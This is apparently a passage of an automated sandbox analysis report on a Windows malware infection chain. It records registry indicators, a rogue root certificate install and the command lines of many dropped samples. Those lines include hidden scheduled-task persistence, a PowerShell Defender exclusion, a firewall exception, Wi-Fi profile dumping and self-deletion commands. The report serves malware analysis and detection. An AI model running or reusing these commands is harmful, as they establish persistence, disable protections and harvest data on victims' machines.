| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\builder.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\pp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\262965725.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\crack.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\snails\ectosphere.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\devtun\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\system32\devtun\RuntimeBroker.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe | N/A |
Processes
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe
"C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe"
C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe" "Server1.exe" ENABLE
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmpE0EC.tmp"
C:\Users\Admin\AppData\Local\Temp\Files\test14.exe
"C:\Users\Admin\AppData\Local\Temp\Files\test14.exe"
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"
C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"
C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe
"C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe"
C:\Users\Admin\AppData\Local\Temp\2910514938.exe
C:\Users\Admin\AppData\Local\Temp\2910514938.exe
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"
C:\Windows\sysnldcvmr.exe
C:\Windows\sysnldcvmr.exe
C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe"
C:\Users\Admin\AppData\Local\Temp\1989129625.exe
C:\Users\Admin\AppData\Local\Temp\1989129625.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Users\Admin\AppData\Local\Temp\2309417675.exe
C:\Users\Admin\AppData\Local\Temp\2309417675.exe
C:\Users\Admin\AppData\Local\Temp\Files\build555.exe
"C:\Users\Admin\AppData\Local\Temp\Files\build555.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe"
C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe
"C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe"
C:\Users\Admin\AppData\Local\snails\ectosphere.exe
"C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe"
C:\Users\Admin\AppData\Local\snails\ectosphere.exe
"C:\Users\Admin\AppData\Local\snails\ectosphere.exe"
C:\Users\Admin\AppData\Local\Temp\262965725.exe
C:\Users\Admin\AppData\Local\Temp\262965725.exe
C:\Users\Admin\AppData\Local\Temp\Files\steel.exe
"C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"
C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe"
C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp
"C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp" /SL5="$7021A,3924197,54272,C:\Users\Admin\AppData\Local\Temp\Files\steel.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\findstr.exe
findstr /R /C:"[ ]:[ ]"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "video_minimizer_12125"
C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe
"C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe" -i
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"
C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\system32\findstr.exe
findstr "SSID BSSID Signal"
C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe
"C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe"
C:\Users\Admin\AppData\Local\Temp\281730318.exe
C:\Users\Admin\AppData\Local\Temp\281730318.exe
C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe
"C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe" & rd /s /q "C:\ProgramData\BKKFCFBKFCFB" & exit
C:\Users\Admin\AppData\Local\Temp\3161510603.exe
C:\Users\Admin\AppData\Local\Temp\3161510603.exe
C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe
"C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe"
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\Files\test26.exe
"C:\Users\Admin\AppData\Local\Temp\Files\test26.exe"
C:\Users\Admin\AppData\Local\Temp\Files\clip.exe
"C:\Users\Admin\AppData\Local\Temp\Files\clip.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Users\Admin\AppData\Local\Temp\Files\random.exe
"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe"
C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe
"C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe"
C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Roaming\System.exe
C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe"
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" & rd /s /q "C:\ProgramData\JKEGDHCFCAAE" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe
"C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe"
C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe
"C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SOCpyMZT5RRL.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe"
C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe"
C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe
"C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe"
C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe
"C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\svhost\svhost.exe
"C:\Users\Admin\AppData\Roaming\svhost\svhost.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\svhost\svhost.exe" /rl HIGHEST /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\timeout.exe
timeout /t 3
C:\Windows\system32\devtun\RuntimeBroker.exe
"C:\Windows\system32\devtun\RuntimeBroker.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe'
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yoo8U08jApyH.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
